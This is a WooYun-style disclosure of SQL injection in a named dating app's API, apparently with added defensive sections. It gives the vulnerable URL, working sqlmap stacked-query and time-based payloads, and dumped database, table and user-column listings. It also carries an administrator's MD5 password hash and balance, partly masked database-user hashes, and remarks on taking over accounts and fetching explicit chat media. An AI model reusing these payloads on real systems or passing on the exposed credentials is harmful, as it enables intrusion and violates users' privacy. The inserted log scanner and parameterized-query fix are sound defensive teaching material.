
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0151042

Title: SQL injection in a location-based stranger-dating app exposes the private data of millions of users

Vendor: himoca.com

Author: Haswell

Submitted: 2015-11-01 14:26

Fix time: 2015-11-06 14:28

Disclosed: 2015-11-06 14:28

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-01: Details sent to the vendor, awaiting vendor action
2015-11-06: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Around June I noticed that the chat topics on this app were generally quite explicit, so......
Then, thanks to procrastination, I never found the time to submit it.
The exposed data includes users' bound phone numbers, email addresses and passwords, chat logs, videos and images (unwatchable), precise geolocation and other sensitive data.
On top of that, the app's virtual currency can be exchanged for RMB at 10:1 and there are all kinds of purchase mechanisms, which makes this rather interesting, you know what I mean.

Detailed description:

The injection point is fairly well hidden: it is in an API called by a temporary prize-draw page, which I seem to recall finding with a Google search operator.

http://api.himoca.com/moca/award/get?uid=1


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: uid (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: uid=1';(SELECT * FROM (SELECT(SLEEP(5)))BNrg)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: uid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))LNQo) AND 'jPbD'='jPbD
---
web application technology: Nginx, PHP 5.6.9
back-end DBMS: MySQL 5.0.11
current database: 'moca'
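As an added example (not part of the original report), the following Python scans Nginx access-log lines for the request shapes that the sqlmap output above records: SLEEP()-based time delays, a quote followed by a statement separator (stacked queries) and a trailing comment terminator, plus a stricter allowlist check that `uid` is the plain decimal integer the endpoint evidently expects. The log lines are constructed for this illustration; the two malicious ones carry the report's own payloads, URL-encoded as a browser or sqlmap would send them.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Nginx "combined"-format access-log lines (not real traffic).
# Lines 2 and 3 carry the two payloads from the report's sqlmap output, URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Nov/2015:14:26:01 +0800] "GET /moca/award/get?uid=1 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Nov/2015:14:26:03 +0800] "GET /moca/award/get?uid=1%27%3B%28SELECT+%2A+FROM+%28SELECT%28SLEEP%285%29%29%29BNrg%29%23 HTTP/1.1" 200 312 "-" "sqlmap/1.0-dev"
10.0.0.5 - - [01/Nov/2015:14:26:09 +0800] "GET /moca/award/get?uid=1%27+AND+%28SELECT+%2A+FROM+%28SELECT%28SLEEP%285%29%29%29LNQo%29+AND+%27jPbD%27%3D%27jPbD HTTP/1.1" 200 312 "-" "sqlmap/1.0-dev"
10.0.0.7 - - [01/Nov/2015:14:27:00 +0800] "GET /moca/award/get?uid=4711 HTTP/1.1" 200 298 "-" "Mozilla/5.0"
"""

# Fields we need from each log line: client IP, timestamp, request target, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the injection shapes sqlmap reported, applied to the decoded value.
SIGNATURES = [
    ("time-based blind", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("stacked query", re.compile(r"""['"]\s*;""")),
    ("comment terminator", re.compile(r"""['"].*(#|--\s)""")),
]

# Allowlist of what known parameters must look like (assumption: uid is a
# decimal integer, as the legitimate request uid=1 suggests).
EXPECTED = {"uid": re.compile(r"^[0-9]{1,10}$")}


def scan_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    findings = []
    # parse_qsl percent-decodes values and turns '+' into a space.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        for label, pat in SIGNATURES:
            if pat.search(value):
                findings.append((name, label))
        expected = EXPECTED.get(name)
        if expected and not expected.match(value):
            findings.append((name, "unexpected type"))
    if not findings:
        return None
    return {"ip": m["ip"], "time": m["ts"], "path": url.path, "findings": findings}


def scan_log(text):
    """Scan every line of a log; lines that do not parse are skipped."""
    return [hit for hit in map(scan_line, text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        labels = ", ".join(label for _, label in hit["findings"])
        print(f'{hit["time"]} {hit["ip"]} {hit["path"]}: {labels}')
```

The signature list catches the probes sqlmap used here, but the allowlist line is the one that generalizes: a `uid` that is not a short decimal integer is wrong regardless of which injection technique it carries, so alerting on the type violation covers probes the signatures never anticipated.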


Unfortunately this happens to be the main database.

available databases [12]:
[*] information_schema
[*] moca
[*] moca_chat_log
[*] moca_dynamic
[*] moca_group
[*] moca_log
[*] moca_openfire
[*] moca_relation
[*] mysql
[*] openfire_393
[*] performance_schema
[*] test


It contains all chat logs and all user data.
Main database: moca

Database: moca
Table: chat_file
[6 columns]
+-------------+---------------------------+
| Column | Type |
+-------------+---------------------------+
| path | varchar(256) |
| create_time | timestamp |
| flags | int(11) |
| id | int(11) unsigned zerofill |
| object_id | text |
| type | varchar(32) |
+-------------+---------------------------+


Chat files: once a path is obtained via the injection it can be fetched from the CDN, and because of the nature of the chat topics the videos and images here are seriously 18+.
For example:

select path from chat_file where path like "%.mp4" limit 1,1:    '/data0/moca/applay/dynamic/0f/58/0f**********1c0b7689717b1b0bd416.mp4'


select path from chat_file where path like "%.mp4" limit 210,221 [1]:
[*] /data0/moca/applay/dynamic/2c/0a/2c********c3a93380ca955f3eeb9ad.mp4


Thirsty men and women.
User data table:

Database: moca
Table: user
[50 columns]
+-------------------+----------------------+
| Column | Type |
+-------------------+----------------------+
| lock | tinyint(1) unsigned |
| platform_d\?81 |
| address | varchar(16) |
| agent_id | int(11) |
| avatar | varchar(50) |
| background_img | varchar(100) |
| birthday | date |
| career | smallint(6) unsigned |
| city | tinyint(4) unsigned |
| client_version | int(8) unsigned |
| country | char(6) |
| device_token | varchar(128) |
| dynamic_time | timestamp |
| email | varchar(50) |
| flags | int(11) |
| get_flower | tinyint(1) unsigned |
| hobby | varchar(128) |
| hx_id | char(32) |
| hx_pass | char(32) |
| integral | int(10) unsigned |
| is_auth | tinyint(1) unsigned |
| label | varchar(32) |
| last_dynamic | varchar(280) |
| last_login_ip | varchar(30) |
| last_login_time | timestamp |
| lat | double |
| lng | double |
| location | varchar(16) |
| login_time | int(10) unsigned |
| nickname | varchar(125) |
| online | tinyint(1) unsigned |
| open_id | varchar(64) |
| password | varchar(32) |
| phone | varchar(20) |
| platform_id_reg | varchar(45) |
| platform_name | varchar(30) |
| province | tinyint(4) unsigned |
| qq_sex_modify | int(2) unsigned |
| reg_from | int(2) unsigned |
| reg_ip | varchar(30) |
| reg_time | timestamp |
| region | tinyint(4) unsigned |
| replace_hobby | varchar(128) |
| replace_nickname | varchar(125) |
| replace_signature | varchar(255) |
| rmb | int(10) unsigned |
| sex | tinyint(1) |
| share | smallint(8) unsigned |
| signature | varchar(255) |
| uid | int(11) |
+-------------------+----------------------+


Not much to say here: it includes password MD5 hashes, bound phone numbers, account balances, email addresses, geolocation and so on.
Once a hash is cracked you can log in to any user's account.
Take the system administrator as an example:

select uid,nickname,phone,password,rmb from user limit 1,1:    '1311977, 摩擦小秘书, , f379eaf3c831b04de153469d1bec345e, 2465736'


"rmb:2465736": that is real money.
And how many users are there in total?

select count(*) from user:    '2852867'


That was in June; by now it is probably around 3 million?
Well, that is about it: always pay attention to the odd corners.

Proof of vulnerability:

web application technology: Nginx, PHP 5.6.9
back-end DBMS: MySQL 5.0.11
available databases [12]:
[*] information_schema
[*] moca
[*] moca_chat_log
[*] moca_dynamic
[*] moca_group
[*] moca_log
[*] moca_openfire
[*] moca_relation
[*] mysql
[*] openfire_393
[*] performance_schema
[*] test
Here is the full table list:
web application technology: Nginx, PHP 5.6.9
back-end DBMS: MySQL 5.0.11
Database: moca
[93 tables]
+-------------------------+
| user |
| advert |
| advert_copy |
| agent |
| agent_user |
| album |
| api_config |
| award |
| award_0316 |
| award_1105 |
| award_1118 |
| award_360_1203 |
| award_sd |
| award_wdj |
| award_wdj1224 |
| bank_config |
| bank_false_msg |
| banner_config |
| banner_config_copy |
| black_ip |
| black_ip_copy |
| captcha |
| channel_info |
| chat_file |
| chat_statistic |
| city |
| click_count |
| click_count_1105 |
| click_count_1118 |
| click_count_1202 |
| click_count_sd |
| click_count_wdj |
| click_count_wdj1224 |
| client_version_config |
| comment |
| cost |
| cost_bak |
| country |
| draw_num |
| draw_num_0316 |
| draw_num_1105 |
| draw_num_1118 |
| draw_num_1202 |
| draw_num_sd |
| draw_num_wdj |
| draw_num_wdj1224 |
| exception_list |
| feedback |
| focus |
| focus_copy |
| ganging |
| ganging_bak |
| gift |
| help |
| image_del |
| label |
| mobile_device |
| model |
| news |
| platform_lock |
| platform_lock_copy |
| play |
| praise |
| purchase |
| report |
| sensitive_words |
| start_img |
| system_config |
| system_messages |
| task |
| task_info |
| temp_user |
| temp_user1 |
| tmp_idfa |
| user4 |
| user_bank |
| user_config |
| user_copy |
| user_device |
| user_device_android |
| user_device_ios |
| user_dynamic |
| user_dynamic_bak |
| user_idfa |
| user_moca |
| user_moca_bak |
| user_notice |
| user_position |
| user_telrecharge_record |
| user_vip |
| user_vip_bak |
| user_withdrawal_record |
| wx_share_user |
+-------------------------+
And the database users' password hashes:
web application technology: PHP 5.6.9
back-end DBMS: MySQL 5.0.11
database management system users password hashes:
[*] agent [1]:
password hash: *40DF9***********9AQE8682A19B2D1FSFFB80A1
[*] dbrep [1]:
password hash: *96ECC***********F3CEEE74DF31FC6F13A223DC
[*] moca_modifyuser [1]:
password hash: NULL
[*] monitor [1]:
password hash: *40DF9***********9ABE868271=B2D1FEFFB80A1
[*] replication [1]:
password hash: *40DF9***********9ABE8682719B2a1FEFFBI0A1
[*] root [1]:
password hash: *EADB8***********41808732C0CBD9D85A9D7F7D
[*] zabbix_monitor [1]:
password hash: *9B053***********C860C0B5E2755AE84F71429D

Fix recommendation:

Do proper boundary defense and input filtering.
A WAF or something similar would also help.
Shouldn't the database structure be reworked as well......
Security aside, the performance must be painful too.
It is the end of the year, any chance of a plane ticket home hhhhhhh
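The recommendation above ("boundary defense and filtering") is the right one but leaves the how unstated, so here is an added example that is not the vendor's code. The real endpoint is PHP on MySQL; this Python stand-in uses an in-memory sqlite3 table (layout and rows invented for the illustration) so it runs offline. It contrasts the vulnerable pattern, splicing the request value into the SQL text, with two layers of defense: an allowlist check at the boundary that only accepts a decimal `uid`, and parameter binding so that whatever reaches the query is treated as data, not SQL. The payload used is the stacked-query one from the report's sqlmap output.

```python
import re
import sqlite3

# Constructed stand-in for the prize-draw endpoint's award lookup (sqlite3 in
# memory; the real service is PHP/MySQL). Table layout and rows are invented.
def init_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE award (id INTEGER PRIMARY KEY, uid INTEGER NOT NULL, prize TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO award (uid, prize) VALUES (?, ?)", [(1, "flower"), (4711, "vip_day")]
    )
    conn.commit()
    return conn


class BadRequest(ValueError):
    """Raised at the boundary when a parameter is not what the endpoint expects."""


# Allowlist: uid is a short decimal integer and nothing else (assumption based on uid=1).
UID_RE = re.compile(r"^[0-9]{1,10}$")


def parse_uid(raw):
    """Boundary check: reject anything that is not a positive decimal integer."""
    if not isinstance(raw, str) or not UID_RE.match(raw):
        raise BadRequest("uid must be a decimal integer")
    uid = int(raw)
    if uid == 0:
        raise BadRequest("uid out of range")
    return uid


def unsafe_query(raw_uid):
    """The vulnerable pattern: the request value is spliced into the SQL text.
    Returned as a string only; it is never executed here."""
    return "SELECT prize FROM award WHERE uid='%s'" % raw_uid


def get_award(conn, raw_uid):
    """Hardened lookup: validate at the boundary, then bind the value as a parameter."""
    uid = parse_uid(raw_uid)
    row = conn.execute("SELECT prize FROM award WHERE uid = ?", (uid,)).fetchone()
    return row[0] if row else None


def lookup_bound_only(conn, raw_uid):
    """Second layer on its own: even with no validation, a bound parameter is data,
    not SQL. The payload is compared as a literal string and matches no row."""
    row = conn.execute("SELECT prize FROM award WHERE uid = ?", (raw_uid,)).fetchone()
    return row[0] if row else None


def rejected(raw_uid):
    """True if the boundary check refuses this value."""
    try:
        parse_uid(raw_uid)
    except BadRequest:
        return True
    return False


# The stacked-query payload from the report's sqlmap output.
STACKED_PAYLOAD = "1';(SELECT * FROM (SELECT(SLEEP(5)))BNrg)#"

if __name__ == "__main__":
    db = init_db()
    print(get_award(db, "1"))                      # flower
    print(rejected(STACKED_PAYLOAD))               # True
    print(unsafe_query(STACKED_PAYLOAD))           # the injected SQL text, unexecuted
    print(lookup_bound_only(db, STACKED_PAYLOAD))  # None
```

Both layers matter: the allowlist turns the attack into a 400 before any database round trip (and gives the log scanner a clean signal), while binding protects the query even when a parameter is legitimately free text and cannot be allowlisted. A WAF, as the author suggests, sits in front of both but should not replace either.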

Copyright notice: please credit Haswell@WooYun when reposting


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-11-06 14:28

Vendor reply:

Vulnerability rank: 15 (WooYun rating)

Latest status:

None yet